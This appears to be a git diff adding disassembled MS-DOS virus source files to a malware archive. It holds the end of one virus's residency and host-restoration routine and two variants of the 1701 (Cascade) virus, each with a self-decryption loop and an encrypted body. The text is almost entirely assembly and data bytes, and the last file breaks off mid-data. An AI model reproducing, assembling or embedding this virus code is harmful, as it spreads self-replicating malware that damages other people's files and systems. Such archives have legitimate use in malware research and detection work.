(701E:FCCD=0) + mov cs:data_40e[di],ds ; (701E:FCCF=0) +loc_38: + mov ah,62h ; 'b' + int 21h ; DOS Services ah=function 62h + ; get progrm seg prefix addr bx + mov es,bx + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov bx,0FFFFh + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + sub bx,50h + nop + jc loc_40 ; Jump if carry Set + mov cx,es + stc ; Set carry flag + adc cx,bx + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov bx,4Fh + stc ; Set carry flag + sbb es:data_14e,bx ; (06E3:0002=2342h) + push es + mov es,cx + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov ax,es + dec ax + mov ds,ax + mov word ptr ds:data_13e,8 ; (0692:0001=0D217h) + call sub_8 + mov bx,ax + mov cx,dx + pop ds + mov ax,ds + call sub_8 + add ax,ds:data_15e ; (06E3:0006=2344h) + adc dx,0 + sub ax,bx + sbb dx,cx + jc loc_39 ; Jump if carry Set + sub ds:data_15e,ax ; (06E3:0006=2344h) +loc_39: + mov si,di + xor di,di ; Zero register + push cs + pop ds + sub si,36Ah + mov cx,4E2h + inc cx + rep movsb ; Rep while cx>0 Mov [si] to es:[di] + mov ah,62h ; 'b' + int 21h ; DOS Services ah=function 62h + ; get progrm seg prefix addr bx + dec bx + mov ds,bx + mov byte ptr ds:data_12e,5Ah ; (0691:0000=0C9h) 'Z' + mov dx,173h + xor ax,ax ; Zero register + push ax + pop ds + mov ax,es + sub ax,10h + mov es,ax + cli ; Disable interrupts + mov ds:data_3e,dx ; (0000:0084=6E3h) + mov ds:data_4e,es ; (0000:0086=161Ah) + sti ; Enable interrupts + dec byte ptr ds:data_9e ; (0000:047B=0) +loc_40: + pop si + cmp word ptr cs:data_32e[si],5A4Dh ; (701E:FC99=0) + jne loc_41 ; Jump if not equal + pop ds + mov ax,cs:data_36e[si] ; (701E:FCBB=0) + mov bx,cs:data_35e[si] ; (701E:FCB9=0) + push cs + pop cx + sub cx,ax + add cx,bx + push cx + push word ptr cs:data_34e[si] ; (701E:FCB7=0) + push ds + pop es + call sub_9 + ret ; Return far +loc_41: + pop ax + mov ax,cs:data_32e[si] ; (701E:FC99=0) + mov cs:data_16,ax ; (701E:0100=63E9h) + mov ax,cs:data_33e[si] ; (701E:FC9B=0) + mov cs:data_17,ax ; (701E:0102=0C303h) + mov ax,100h + push ax + push cs + pop ds + push ds + pop es + call sub_9 + ret +sub_10 endp + + +code_seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.1701-b.asm b/MSDOS/Virus.MSDOS.Unknown.1701-b.asm new file mode 100644 index 00000000..c302c84e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1701-b.asm @@ -0,0 +1,424 @@ + +PAGE 59,132 + +; +; +; 1701-B +; +; Created: 11-Feb-92 +; Passes: 5 Analysis Options on: none +; +; + +data_31e equ 27D1h ;* +data_36e equ 4CD6h ;* +data_39e equ 6950h ;* +data_45e equ 8848h ;* +data_50e equ 0BDF1h ;* +data_53e equ 0CBC7h ;* +data_56e equ 0EA36h ;* +data_59e equ 49F2h +data_60e equ 0B0E0h +data_61e equ 0BCF1h +data_62e equ 0EAEFh + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +1701-b proc far + +start: + jmp loc_3 + db 39 dup (0) +data_22 db 0 ; Data table (indexed access) + db 30 dup (0) + db 28 dup (0) +loc_3: + cli ; Disable interrupts + mov bp,sp + call sub_1 + +1701-b endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop bx + sub bx,131h + test cs:data_22[bx],1 + jz $+11h ; Jump if zero + lea si,[bx+14Dh] ; Load effective addr + mov sp,682h +loc_5: + xor [si],si + xor [si],sp + inc si + dec sp + jnz loc_5 ; Jump if not zero + db 8Eh,0EBh,0E5h,0BDh, 62h,0F6h + db 0F7h, 06h,0EFh,0EEh,0EEh, 2Fh + db 0C2h,0E6h,0E6h,0E2h,0B1h, 11h + db 0EEh, 02h, 6Ch,0F8h, 36h,0EAh + db 0B7h,0DAh,0D0h,0C0h,0C2h,0C6h + db 0E6h,0C2h + +locloop_6: + mov si,dx + xchg dh,bh + db 60h,0D4h,0ABh, 69h, 96h,0EEh + db 0EEh,0E2h, 0Bh,0A0h,0EFh,0E2h + db 0E2h,0EEh,0EEh,0F2h,0FAh,0F6h + db 0F6h +loc_8: + db 0F2h,0F2h, 30h, 8Ch,0FEh, 8Bh + db 0FAh, 8Fh, 82h, 82h, 8Fh, 8Eh + db 0B9h, 45h,0F6h,0F6h,0F2h,0F2h + db 0EEh,0EEh,0E2h,0E3h, 1Bh, 16h + db 0C2h + db 0C2h,0CEh + db 0CEh, 1Ah,0F2h,0F6h,0ADh, 73h + db 19h, 6Dh,0CFh,0ECh, 4Eh, 49h + db 92h,0C3h,0ECh, 47h, 49h,0A4h + db 0F3h,0D8h, 7Dh, 75h,0AAh,0EFh + db 4Dh,0E2h,0E3h,0C8h, 6Ch, 65h + db 0B8h,0EFh, 4Ch,0F0h,0F3h,0A5h + db 42h,0C2h, 3Fh, 2Fh, 56h, 3Dh + db 03h, 77h, 14h,0B9h,0FEh, 46h + db 3Eh, 0Eh,0C1h, 00h, 3Bh,0D3h + db 73h, 11h, 44h,0B7h, 97h,0E9h + db 94h,0F4h + db 19h,0F0h,0E9h,0DCh, 79h, 71h + db 0A0h,0F3h,0DCh, 31h, 61h, 90h + db 0C3h, 95h, 7Eh,0E3h,0F7h, 03h + db 0EFh, 79h, 31h,0ADh,0D8h, 7Bh + db 75h, 8Fh,0EFh,0CCh, 6Eh, 61h + db 85h,0E3h, 5Ah,0EEh, 1Eh, 7Ch + db 32h, 49h,0FEh, 12h, 73h,0B3h + db 0CDh,0CDh,0F7h, 9Dh, 07h,0FFh + db 80h,0DEh,0DCh, 87h,0E6h, 77h + db 8Bh,0F6h,0DCh +loc_14: + into ; Int 4 on overflow + db 9Bh,0EFh, 63h, 9Bh,0E0h,0ABh + db 0A0h, 9Bh,0E8h, 71h, 8Fh,0FEh + db 0BBh, 86h, 45h, 76h,0B5h,0C2h + db 4Eh, 0Bh, 8Bh, 4Ch, 07h,0E0h + db 45h,0C4h,0E4h,0F6h,0D0h, 7Bh + db 0C4h,0EFh,0EEh,0C4h, 69h,0F0h + db 0E5h,0E2h,0C4h, 4Dh,0EDh,0F2h + db 0D4h, 30h,0F0h,0F2h,0F2h, 43h + db 25h,0D2h, 48h, 43h, 05h,0EAh + db 47h, 80h,0CBh,0A1h, 46h,0A6h + db 7Dh, 2Fh, 3Fh,0CFh,0B5h,0D1h + db 1Dh,0E0h,0F1h,0B5h, 6Fh, 51h + db 20h,0F5h, 79h, 01h + db 4Fh + db 57h,0F4h, 33h, 3Dh, 66h,0C4h +loc_16: + dec bx + dec cx + mov dl,0C0h + lahf ; Load ah from flags + add ax,7EDCh + jns loc_14 ; Jump if not sign + db 0F3h, 7Fh, 61h,0C4h,0E3h, 11h + db 42h,0C8h, 6Eh,0ECh,0D8h,0EEh + db 0BFh, 7Ch, 33h,0D0h + db 7Bh,0E4h, 8Dh, 8Eh,0A4h, 44h + db 80h + db 86h, 82h,0D8h,0A8h, 02h,0FCh + db 0F3h +loc_19: + div byte ptr [bp+di+377Ch] ; al,ah rem = ax/data + lock jmp $-211h +sub_1 endp + + db 6Bh, 51h,0C8h,0E3h, 51h,0EEh + db 0F3h, 4Bh, 53h,0F0h, 0Eh, 01h + db 6Ah,0C8h, 4Fh,0C4h, 42h,0C4h + db 92h + db 9 + db 0E0h, 09h,0F4h,0DEh,0F6h,0F6h + db 0F2h,0DCh, 62h,0E0h,0F4h,0E2h + db 0F8h, 6Bh,0F4h,0FEh,0EDh,0E0h + db 0EDh, 4Ah,0D7h,0D3h, 3Fh,0D3h + db 11h,0BBh, 19h,0B9h, 87h, 07h + db 0CEh, 22h,0E7h,0FCh,0F2h, 46h + db 0DCh, 3Bh,0D3h, 73h, 17h, 2Ah + db 0E5h, 95h, 83h, 92h,0C8h, 63h + db 17h, 52h,0F5h, 87h,0ABh,0E8h + db 4Ah,0DAh,0FBh, 03h,0E3h,0ECh + db 4Fh,0D8h,0F9h,0C3h,0E0h + db 42h + db 0F4h,0CFh,0F7h, 4Eh,0DAh,0D7h + db 54h,0CCh,0E5h,0ECh,0F9h, 2Bh + db 0C3h,0FDh,0C0h, 6Eh,0FCh,0A5h + db 0F7h,0FEh, 19h,0F4h, 1Eh, 0Eh +loc_22: + jl loc_19 ; Jump if < + hlt ; Halt processor + mov dl,6Ah ; 'j' + dec word ptr ds:data_56e[si] + out 1Eh,ax ; port 1Eh ??I/O Non-standard + jc loc_22 ; Jump if carry Set + mov dl,0C0h + dec bp + mov sp,0C8E3h + inc bp + and bl,0C0h + sub sp,si + xchg ax,si + div di ; ax,dx rem=dx:ax/reg + db 0F2h, 4Ah,0D2h,0FBh, 0Fh,0E3h + db 0E8h, 4Fh,0DCh,0F1h,0CFh,0E0h + db 7Eh,0F4h + db 0C3h,0F7h,0ECh, 4Ah,0F2h,0CBh + db 58h, 5Fh,0E0h,0E8h,0FDh, 2Fh + db 0CFh,0F1h, 49h, 24h, 09h, 1Fh + db 65h, 0Ch, 8Eh,0F2h, 49h, 76h + db 16h, 28h,0FDh, 2Ch, 39h, 0Fh + db 4Dh, 58h,0A3h,0D8h, 36h,0F4h + db 0D9h,0EFh, 6Eh, 28h, 29h,0DAh + db 1Dh, 96h, 1Fh,0D2h,0F2h, 87h + db 1Eh, 6Ah,0A2h,0A1h, 9Fh, 9Ch + db 94h, 95h, 93h,0C0h,0DCh,0ECh + db 47h,0D8h,0B5h,0F3h,0D8h, 7Ah + db 0ECh,0BBh,0EFh,0E0h,0E5h, 5Ah + db 0E6h,0DBh, 2Fh,0C3h, 9Ch,0B8h + db 79h, 2Ah, 4Eh,0F6h,0A5h, 3Fh + db 0AFh,0A0h, 0Bh, 94h,0C5h, 87h + db 0ACh, 0Bh, 80h,0CBh,0F3h, 46h + db 0C9h,0F8h,0EDh, 48h,0C0h,0EFh + db 5Bh,0E1h,0E6h, 2Bh,0C3h, 90h + db 0D9h,0D5h, 33h, 87h,0C5h, 4Eh + db 0F0h,0B0h,0FDh, 07h,0F1h, 10h + db 0Bh,0E7h,0ECh, 61h, 85h + db 0CFh,0DCh, 7Bh,0E0h,0BBh,0F3h + db 46h,0D0h, 23h,0C3h,0CCh, 67h + db 0D8h,0CCh,0E3h,0A3h,0B4h, 87h + db 0F1h, 1Fh, 31h,0F2h,0DCh, 8Dh + db 37h, 48h, 04h, 01h, 76h, 0Ch + db 2Bh, 88h, 37h,0BEh,0F3h,0CDh + db 0Fh, 84h,0F1h, 07h, 5Dh,0E2h + db 0CCh, 66h,0D8h,0CCh,0E3h, 07h + db 9Bh,0FCh,0DCh + db 57h +loc_27: + mov bp,0F7F3h + xchg ax,di + aaa ; Ascii adjust + in al,dx ; port 0FEC0h ??I/O Non-standard + stc ; Set carry flag + db 0C0h,0E9h + db 0C3h,0B6h, 29h, 76h,0F2h,0B1h + db 0D8h, 33h,0E4h,0B5h,0EFh, 23h + db 0C3h, 90h, 3Dh,0C8h, 6Bh,0ECh + db 0AFh,0EFh, 72h, 03h,0D6h, 00h + db 33h,0D5h,0FAh, 87h, 3Ah, 83h + db 0C5h,0B5h, 4Bh, 4Fh,0AFh + db 0FCh, 37h, 4Ah,0F4h + db 0CBh, 3Fh,0D3h, 9Ch, 50h, 69h + db 3Ah, 5Eh,0E4h,0A0h,0D1h, 27h + db 0DDh, 20h, 3Fh,0D7h, 1Eh,0A2h + db 0F1h,0BDh,0D6h, 7Ah,0C2h, 84h + db 0E8h, 49h,0CCh, 83h,0CFh,0DCh + db 79h,0E0h,0BDh,0F3h, 3Fh,0CFh + db 5Ah,0A2h,0D1h, 2Fh, 2Bh,0C3h + db 09h,0CFh, 7Eh + db 4Ah,0F2h,0B4h,0C5h, 3Bh,0C1h + db 0DCh,0C3h, 23h, 70h, 13h, 28h + db 0A3h, 49h, 0Fh, 0Bh, 0Ch, 0Dh + db 0D8h, 55h,0A2h,0F3h, 5Ah,0AEh + db 58h,0ADh,0E7h, 5Fh,0E1h,0E2h + db 23h,0CFh, 4Ah,0F3h,0A1h,0D8h + db 79h,0E4h, 8Dh,0CFh,0ECh, 49h + db 0C8h, 83h,0C3h, 0Fh,0EFh, 7Ah + db 0CCh, 3Fh,0D7h,0D8h, 79h,0FCh + db 0AFh,0EFh, 14h, 23h,0E1h, 93h + db 0E7h, 14h, 2Fh,0CEh, 87h,0F8h + db 4Eh,0F7h,0B1h,0DCh, 4Bh, 98h + db 0C5h, 83h, 4Bh,0A7h, 9Dh, 85h + db 0D3h,0D1h,0ACh,0A8h,0AFh,0ADh + db 0AAh, 6Fh, 07h, 5Ch, 1Ch,0FCh + db 0E8h +loc_33: + stc ; Set carry flag + mov cl,0B3h + mov sp,4BBEh + cmc ; Complement carry + db 0F6h, 4Dh, 86h,0F3h, 31h,0F9h + db 49h, 85h, 38h,0D7h,0C5h, 89h + db 85h + db 2Ch, 05h,0AAh,0E7h,0F1h, 79h + db 0E5h,0B6h,0E5h, 22h, 96h,0E4h + db 11h, 00h, 69h, 2Ch,0B4h,0ABh + db 0A9h,0E9h, 35h,0ECh,0F4h, 58h + db 58h, 52h, 0Dh, 00h,0BEh, 43h + db 03h, 81h,0D6h, 4Ch, 94h,0F7h + db 48h, 9Eh,0F2h, 57h,0E6h,0E2h + db 1Eh, 15h, 43h,0BBh,0BDh,0B0h + db 0E9h,0EDh, 31h,0A0h,0E8h,0A0h + db 78h, 08h, 38h,0E4h, 90h,0C7h + db 70h,0C2h,0C1h + db 0Ch + db 1Fh, 12h,0F1h,0F0h,0ACh,0F3h + db 79h, 1Eh, 18h,0E4h,0B6h,0E7h + db 19h, 6Ch,0FCh,0B6h,0EFh, 86h + db 0E0h, 4Ch, 2Ch,0F1h, 08h, 62h + db 26h, 8Ah,0F7h, 8Fh, 2Eh, 83h + db 0F7h, 79h, 62h, 5Ah,0F3h, 82h + db 0Dh, 5Fh + db 09h,0B4h,0F1h,0BCh, 21h,0B1h + db 0E0h,0B0h,0B1h, 65h, 36h, 78h + db 34h, 00h,0D0h,0A0h,0F3h, 78h + db 0CEh,0C1h, 00h, 17h, 26h,0C1h + db 0C4h, 94h,0CFh, 79h, 0Ah, 00h + db 0F0h,0A6h,0F3h, 11h, 60h,0E4h + db 0BAh,0E7h, 92h,0F0h, 58h, 34h + db 0EDh, 08h, 1Eh, 5Eh,0FEh, 87h + db 0FBh,0A6h, 0Fh, 77h,0F5h,0EAh + db 0AEh, 03h, 76h,0F5h, 85h, 31h + db 58h, 0Dh,0ADh,0A8h,0F5h,0B1h + db 2Dh,0B3h,0B3h, 6Dh,0E8h,0BEh + db 0E3h, 0Ch, 10h,0ABh, 10h, 00h + db 0AFh, 31h,0A2h, 2Ah,0AFh,0F6h + db 0C0h,0E2h, 38h, 24h,0A3h, 96h + db 0Dh,0CEh,0F2h, 82h,0FCh,0CEh + db 0D2h, 9Ah,0E8h,0DEh, 1Dh, 92h + db 0E4h, 1Ah, 21h, 17h, 2Dh,0CEh + db 42h, 84h,0F0h,0CEh, 2Dh,0F9h + db 8Ch, 7Bh, 41h, 7Eh, 45h, 9Ch + db 3Ah,0CEh, 8Eh, 7Ch, 2Ah, 0Dh + db 57h, 9Eh,0F2h,0D5h,0E8h, 8Eh + db 0E2h, 92h, 1Ch,0D1h +loc_37: + sub cx,[bx-7Eh] + db 0F2h,0B3h, 82h,0E3h,0C9h,0F4h + db 0A2h,0CEh,0B6h, 35h,0D9h, 4Dh + db 03h,0F1h, 1Ch, 77h,0FDh,0F2h + db 01h, 07h,0DCh, 51h,0B2h,0EFh + db 21h,0ABh + db 0Dh, 08h + db 24h,0E4h + db 0BDh,0EFh,0EAh,0ECh, 4Eh,0B6h + db 0F2h, 7Ch,0D6h,0ACh, 4Fh, 01h + db 1Ah,0A6h, 5Bh, 00h,0BFh,0F2h + db 49h,0C2h,0E7h, 41h,0F2h,0F4h + db 0BBh, 23h,0F2h,0BFh,0E1h, 66h + db 18h, 1Dh, 9Ah,0EAh, 7Ah,0E4h + db 0A5h,0F7h, 46h,0FDh, 03h,0DEh + db 4Ah,0E4h, 94h,0C7h, 04h,0C4h + db 9Ah,0CFh,0F2h, 35h,0F0h,0AEh + db 0F3h,0F2h, 5Eh,0D2h,0E5h, 96h + db 0D0h, 94h + db 0E1h, 0Bh, 0Eh,0EEh, 35h,0F4h + db 0AEh,0F7h,0F2h, 4Ah,0B2h, 8Dh + db 0F5h + +locloop_40: + movsw ; Mov [si] to es:[di] +;* mov dx,offset loc_46 ;* + db 0BAh, 84h,0F0h + mov ax,ds:data_45e + cmpsb ; Cmp [si] to es:[di] + db 0F3h,0F7h, 56h,0A1h,0F3h, 10h + db 2Eh, 14h,0C4h,0B4h,0E7h, 41h + db 80h,0EFh, 4Fh, 96h,0F3h,0CDh + db 0F0h, 90h,0F3h,0B8h,0CDh, 63h + db 0A0h,0C7h, 2Eh,0A9h, 3Ch, 8Eh + db 45h, 02h,0C1h, 09h,0B1h, 53h + db 90h,0EFh, 3Fh, 02h,0D9h, 1Eh + db 90h,0E1h, 0Bh, 4Eh,0EEh, 72h + db 0FCh,0A1h,0F7h,0F0h, 52h, 5Ch + db 0Fh,0B6h, 02h,0EEh, 4Ah,0FCh + db 88h,0DEh,0AEh,0A1h,0F3h, 42h + db 0F6h, 1Ah,0B0h, 10h, 64h, 12h + db 0Ah, 60h, 18h, 0Ah,0F3h, 11h + db 9Ch, 20h, 1Ah,0EAh, 09h, 80h + db 3Fh, 6Ch, 9Bh,0C3h, 4Ah,0E0h + db 90h,0C3h, 48h,0C0h, 9Dh,0F3h + db 47h,0F6h, 08h, 34h,0C8h,0D8h + db 0BDh,0E3h, 95h,0B4h, 0Eh, 86h + db 1Ch,0D4h,0C8h,0A4h,0F3h, 83h + db 0BFh, 1Ah, 1Bh, 70h,0FCh,0AAh + db 6Ah, 72h, 78h,0F0h,0BDh, 70h + db 48h,0C8h,0C4h,0A5h,0F7h, 85h + db 0C5h, 06h,0A7h, 1Ch,0D8h,0C0h + db 0B0h,0E3h, 97h,0C0h, 06h, 3Ch + db 0Ch, 85h, 13h, 1Ah, 4Ch, 30h + db 30h, 0Ch, 2Ah,0F0h, 38h, 60h + db 97h,0CFh, 30h, 34h, 72h,0D0h + db 0A1h,0F3h, 0Fh, 10h, 20h, 52h + db 0C2h, 0Eh,0BBh, 1Ch, 1Ch, 28h + db 4Eh,0A7h,0F3h, 1Eh,0A3h, 0Ch + db 11h, 0Ah,0E7h, 8Dh,0FDh, 4Eh + db 0ECh,0A5h,0F5h, 09h, 58h,0F2h + db 0F0h, 82h,0F5h, 1Bh,0AEh, 11h + db 06h, 69h, 1Ch,0A8h, 92h,0E1h + db 0Bh,0BFh, 11h, 16h, 93h,0D2h + db 0Ah, 14h, 93h, 0Dh,0E0h, 34h + db 0C4h, 91h,0C7h,0CBh,0B7h, 96h + db 0E0h, 72h,0FCh,0A1h,0F7h,0F3h + db 0DCh, 11h,0E0h,0BCh,0E3h, 93h + db 0A3h,0FCh + +locloop_41: + in al,0E0h ; port 0E0h, Memory encode reg2 + db 0F1h,0FCh,0F5h,0A6h,0A5h,0A3h + db 0A0h,0D8h,0D9h,0D7h, 32h,0A6h + db 60h,0A2h, 23h,0EEh, 8Fh,0CFh + db 0CAh,0F2h, 85h,0F1h, 4Ah,0D6h + db 0EAh, 0Ah, 9Ch, 1Bh,0A6h, 41h + db 0BCh,0EFh, 4Dh, 92h,0F3h, 1Eh + db 61h, 0Ch, 4Ah,0CDh,0CEh, 2Ah + db 0ACh, 3Bh, 86h, 35h,0E4h,0AAh + db 0CFh, 81h,0F1h, 4Eh, 09h, 0Dh + db 51h, 8Ah,0EFh,0BFh,0BDh,0B8h + db 0BCh,0BBh,0B9h,0B6h,0E9h,0EDh + db 0DCh, 76h,0D0h,0A5h,0F3h,0F0h + db 20h,0FDh, 2Ch, 35h, 07h, 2Ch + db 0F4h, 08h, 59h,0F3h,0FAh, 82h + db 0EBh,0A2h,0A3h,0BCh, 5Ah,0C8h + db 2Fh,0C7h, 67h, 1Bh, 26h,0E9h + db 9Ch,0FFh, 85h,0F3h + +locloop_42: + jbe loc_45 ; Jump if below or = + clc ; Clear carry flag + mov sp,0ECC8h + inc dx + loopnz locloop_41 ; Loop if zf=0, cx>0 + + retn + db 35h, 94h + db 97h + db 0AAh +loc_45: + esc 4,[bx+di] ; coprocessor escape + esc 0,cl ; coprocessor escape + db 0F3h,0E8h,0BDh, 56h,0AAh, 5Dh + db 8Dh,0E2h, 2Fh,0CFh,0B5h, 81h + db 0F1h, 0Fh,0F1h, 31h,0DCh, 48h + db 88h, 82h, 83h, 87h, 08h, 42h + db 8Ch, 91h,0BDh, 0Dh, 4Ch,0F6h + db 0F7h, 4Bh, 57h,0E8h, 12h, 11h + db 46h, 59h,0C5h,0E2h, 5Ch,0CDh + db 0EFh,0F1h,0C4h,0BDh,0F7h, 4Bh + db 70h,0C8h,0E8h,0F3h,0F7h,0E0h + db 0F7h,0CFh, 85h, 88h, 2Ch, 04h + db 7Ch, 2Eh, 42h,0B2h,0C1h, 3Ch + db 57h, 47h,0E4h, 2Bh,0C7h, 7Eh + db 0B2h, 5Ah,0A7h, 3Fh,0D3h,0AEh + db 6Bh,0FCh,0EDh, 7Ch,0BBh, 36h + db 0CCh, 7Ch,0BFh, 0Ah,0F5h,0C2h + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.1701.asm b/MSDOS/Virus.MSDOS.Unknown.1701.asm new file mode 100644 index 00000000..922e5943 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1701.asm @@ -0,0 +1,427 @@ + +PAGE 59,132 + +; +; +; 1701 +; +; Created: 11-Feb-92 +; Passes: 5 Analysis Options on: none +; +; + +data_31e equ 27D1h ;* +data_36e equ 4CD6h ;* +data_39e equ 6950h ;* +data_45e equ 8848h ;* +data_50e equ 0BDF1h ;* +data_53e equ 0CBC7h ;* +data_55e equ 0EA36h ;* +data_58e equ 49F2h +data_59e equ 0B0E0h +data_60e equ 0BCF1h +data_61e equ 0EAEFh + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +1701 proc far + +start: + jmp loc_2 + db 39 dup (0) +data_22 db 0 ; Data table (indexed access) + db 58 dup (0) +loc_2: + cli ; Disable interrupts + mov bp,sp + call sub_1 + +1701 endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop bx + sub bx,131h + test cs:data_22[bx],1 + jz $+11h ; Jump if zero + lea si,[bx+14Dh] ; Load effective addr + mov sp,682h +loc_4: + xor [si],si + xor [si],sp + inc si + dec sp + jnz loc_4 ; Jump if not zero + db 8Eh,0EBh,0E5h,0BDh, 62h,0F6h + db 0F7h, 06h,0EFh,0EEh,0EEh, 2Fh + db 0C2h,0E6h,0E6h,0E2h,0B1h, 11h + db 0EEh, 02h, 6Ch,0F8h, 36h,0EAh + db 3Bh,0DCh,0E0h,0C3h,0C2h,0C6h + db 0E6h,0C2h + +locloop_5: + mov si,dx + push es + db 0F1h, 60h,0D4h,0ABh, 69h, 96h + db 0EEh,0EEh,0E2h, 0Bh, 06h,0DBh + db 0E2h + db 0E2h,0EEh,0EEh,0F2h,0FAh,0F6h + db 0F6h +loc_7: + db 0F2h,0F2h, 7Ah, 87h, 61h +loc_9: + test ah,[di-80h] + add byte ptr [bp+si-7171h],0F6h + jc loc_9 ; Jump if carry Set + div dl ; al, ah rem = ax/reg + db 0F2h,0EEh,0EEh,0E2h,0E3h, 1Bh + db 16h,0C2h + db 0C2h,0CEh + db 0CEh, 1Ah,0F2h,0F6h,0ADh, 73h + db 19h, 6Dh,0CFh,0ECh, 4Eh, 49h + db 92h,0C3h,0ECh, 47h, 49h,0A4h + db 0F3h,0D8h, 7Dh, 75h,0AAh,0EFh + db 4Dh,0E2h,0E3h,0C8h, 6Ch, 65h + db 0B8h,0EFh, 4Ch,0F0h,0F3h,0A5h + db 42h,0C2h, 3Fh, 2Fh, 56h, 3Dh + db 03h, 77h, 14h,0B9h,0FEh, 46h + db 3Eh, 0Eh,0C1h, 00h, 3Bh,0D3h + db 73h, 11h, 44h,0B7h, 97h,0E9h + db 94h,0F4h + db 19h,0F0h,0E9h,0DCh, 79h, 71h + db 0A0h,0F3h,0DCh, 31h, 61h, 90h + db 0C3h, 95h, 7Eh,0E3h,0F7h, 03h + db 0EFh, 79h, 31h,0ADh,0D8h, 7Bh + db 75h, 8Fh,0EFh,0CCh, 6Eh, 61h + db 85h,0E3h, 5Ah,0EEh, 1Eh, 7Ch + db 32h, 49h,0FEh, 12h, 73h,0B3h + db 0CDh,0CDh,0F7h, 9Dh, 07h,0FFh + db 80h,0DEh,0DCh, 87h,0E6h, 77h + db 8Bh,0F6h,0DCh +loc_14: + into ; Int 4 on overflow + db 9Bh,0EFh, 63h, 9Bh,0E0h,0ABh + db 0A0h, 9Bh,0E8h, 71h, 8Fh,0FEh + db 0BBh, 86h, 45h, 76h,0B5h,0C2h + db 4Eh, 0Bh, 8Bh, 4Ch, 07h,0E0h + db 45h,0C4h,0E4h,0F6h,0D0h, 7Bh + db 0C4h,0EFh,0EEh,0C4h, 69h,0F0h + db 0E5h,0E2h,0C4h, 4Dh,0EDh,0F2h + db 0D4h, 30h,0F0h,0F2h,0F2h, 43h + db 25h,0D2h, 48h, 43h, 05h,0EAh + db 47h, 80h,0CBh,0A1h, 46h,0A6h + db 7Dh, 2Fh, 3Fh,0CFh,0B5h,0D1h + db 1Dh,0E0h,0F1h,0B5h, 6Fh, 51h + db 20h,0F5h, 79h, 01h + db 4Fh + db 57h,0F4h, 33h, 3Dh, 66h,0C4h +loc_16: + dec bx + dec cx + mov dl,0C0h + lahf ; Load ah from flags + add ax,7EDCh + jns loc_14 ; Jump if not sign + db 0F3h, 7Fh, 61h,0C4h,0E3h, 11h + db 42h,0C8h, 6Eh,0ECh,0D8h,0EEh + db 0BFh, 7Ch, 33h,0D0h + db 7Bh,0E4h, 8Dh, 8Eh,0A4h, 44h + db 80h + db 86h, 82h,0D8h,0A8h, 02h,0FCh + db 0F3h +loc_19: + div byte ptr [bp+di+377Ch] ; al,ah rem = ax/data + lock jmp $-211h +sub_1 endp + + db 6Bh, 51h,0C8h,0E3h, 51h,0EEh + db 0F3h, 4Bh, 53h,0F0h, 0Eh, 01h + db 6Ah,0C8h, 4Fh,0C4h, 42h,0C4h + db 92h + db 9 + db 0E0h, 09h,0F4h,0DEh,0F6h,0F6h + db 0F2h,0DCh, 62h,0E0h,0F4h,0E2h + db 0F8h, 6Bh,0F4h,0FEh,0EDh,0E0h + db 0EDh, 4Ah,0D7h,0D3h, 3Fh,0D3h + db 11h,0BBh, 19h,0B9h, 87h, 07h + db 0CEh, 22h,0E7h,0FCh,0F2h, 46h + db 0DCh, 3Bh,0D3h, 73h, 17h, 2Ah + db 0E5h, 95h, 83h, 92h,0C8h, 63h + db 17h, 52h,0F5h, 87h,0ABh,0E8h + db 4Ah,0DAh,0FBh, 03h,0E3h,0ECh + db 4Fh,0D8h,0F9h,0C3h,0E0h + db 42h + db 0F4h,0CFh,0F7h, 4Eh,0DAh,0D7h + db 54h,0CCh,0E5h,0ECh,0F9h, 2Bh + db 0C3h,0FDh,0C0h, 6Eh,0FCh,0A5h + db 0F7h,0FEh, 19h,0F4h, 1Eh, 0Eh +loc_22: + jl loc_19 ; Jump if < + hlt ; Halt processor + mov dl,6Ah ; 'j' + dec word ptr ds:data_55e[si] + out 1Eh,ax ; port 1Eh ??I/O Non-standard + jc loc_22 ; Jump if carry Set + mov dl,0C0h + dec bp + mov sp,0C8E3h + inc bp + and bl,0C0h + sub sp,si + xchg ax,si + div di ; ax,dx rem=dx:ax/reg + db 0F2h, 4Ah,0D2h,0FBh, 0Fh,0E3h + db 0E8h, 4Fh,0DCh,0F1h,0CFh,0E0h + db 7Eh,0F4h + db 0C3h,0F7h,0ECh, 4Ah,0F2h,0CBh + db 58h, 5Fh,0E0h,0E8h,0FDh, 2Fh + db 0CFh,0F1h, 49h, 24h, 09h, 1Fh + db 65h, 0Ch, 8Eh,0F2h, 49h, 76h + db 16h, 28h,0FDh, 2Ch, 39h, 0Fh + db 4Dh, 58h,0A3h,0D8h, 36h,0F4h + db 0D9h,0EFh, 6Eh, 28h, 29h,0DAh + db 1Dh, 96h, 1Fh,0D2h,0F2h, 87h + db 1Eh, 6Ah,0A2h,0A1h, 9Fh, 9Ch + db 94h, 95h, 93h,0C0h,0DCh,0ECh + db 47h,0D8h,0B5h,0F3h,0D8h, 7Ah + db 0ECh,0BBh,0EFh,0E0h,0E5h, 5Ah + db 0E6h,0DBh, 2Fh,0C3h, 9Ch,0B8h + db 79h, 2Ah, 4Eh,0F6h,0A5h, 3Fh + db 0AFh,0A0h, 0Bh, 94h,0C5h, 87h + db 0ACh, 0Bh, 80h,0CBh,0F3h, 46h + db 0C9h,0F8h,0EDh, 48h,0C0h,0EFh + db 5Bh,0E1h,0E6h, 2Bh,0C3h, 90h + db 0D9h,0D5h, 33h, 87h,0C5h, 4Eh + db 0F0h,0B0h,0FDh, 07h,0F1h, 10h + db 0Bh,0E7h,0ECh, 61h, 85h + db 0CFh,0DCh, 7Bh,0E0h,0BBh,0F3h + db 46h,0D0h, 23h,0C3h,0CCh, 67h + db 0D8h,0CCh,0E3h,0A3h,0B4h, 87h + db 0F1h, 1Fh, 31h,0F2h,0DCh, 8Dh + db 37h, 48h, 04h, 